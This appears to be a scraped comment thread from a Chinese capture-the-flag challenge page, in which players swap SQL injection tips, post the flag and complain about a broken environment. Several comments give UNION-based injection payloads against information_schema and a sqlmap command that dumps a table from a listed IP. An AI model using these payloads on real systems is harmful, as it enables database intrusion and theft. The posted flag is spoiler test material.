评分(22)
解题动态
yjyyds 攻破了该题 4小时前
aaa1 攻破了该题 5小时前
932041046 攻破了该题 12小时前
2970507147 攻破了该题 12小时前
llggff 攻破了该题 22小时前
walkerming 攻破了该题 22小时前
orange2015 攻破了该题 22小时前
desireart 攻破了该题 1天前
zcgzcx1234 攻破了该题 1天前
13542813032 攻破了该题 1天前
暗A166668 攻破了该题 2天前
weiyouzhunze 攻破了该题 2天前
wlaqxb 攻破了该题 2天前
吴王饭差 攻破了该题 2天前
欲语泪先流 攻破了该题 2天前
白六真的6 攻破了该题 3天前
dream666 攻破了该题 3天前
ZQCblack 攻破了该题 3天前
QEQEQE 攻破了该题 3天前
评论
3166235571 1年前
举报
flag{467bbedc241402f5b4e28f37ace7ef82}
不聪明小孩 1年前
举报
-1 'union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database()#找到列名skctf_flag,才能从fl4g的表里面找到对应的列的值
19818532957 1年前
举报
佬,请问为什么用这条只能爆出一个字段名?-1 'union select 1,2,3,column_name from information_schema.columns where table_name='fl4g'; #
DrKeen 1年前
举报
hackbar有问题id=1'做不到,用burp搞了
SmallH 1年前
举报
是不是真的环境被改了呀?真的对照WriteUp一步一步来还是没回显,每次注入就全部重置,是不是考虑退一下金币了???
.⎛⎝•̀ω•́⎠⎞. 1年前
举报
我用sqlmap做出来了
gboyd 1年前
举报
我1’ 1” 1‘) 1”) 1 都试过了为啥都显示正常啊!!!!!
NPC 1年前
举报
环境绝对有问题,照着答案注入都无回显!!!退金币!
EtHat 1年前
举报
sqlmap一把梭哈
blackjack009 1年前
举报
python sqlmap.py -u http://114.67.175.224:11724/index.php --random-agent --dbms mysql --data="id=1" -p id -v 6 -T fl4g --dump
18946551925 1年前
举报
为什么一注入就连接已重置啊??????烦死了,差哪呢?
xiaohaisec 1年前
举报
1'报错 1"不报错,所以使用' 查询数据表 -1' union select 1,database(),group_concat(table_name),4 from information_schema.tables where table_schema=database()# sc fl4g 查询表的字段名 -1' union select 1,databa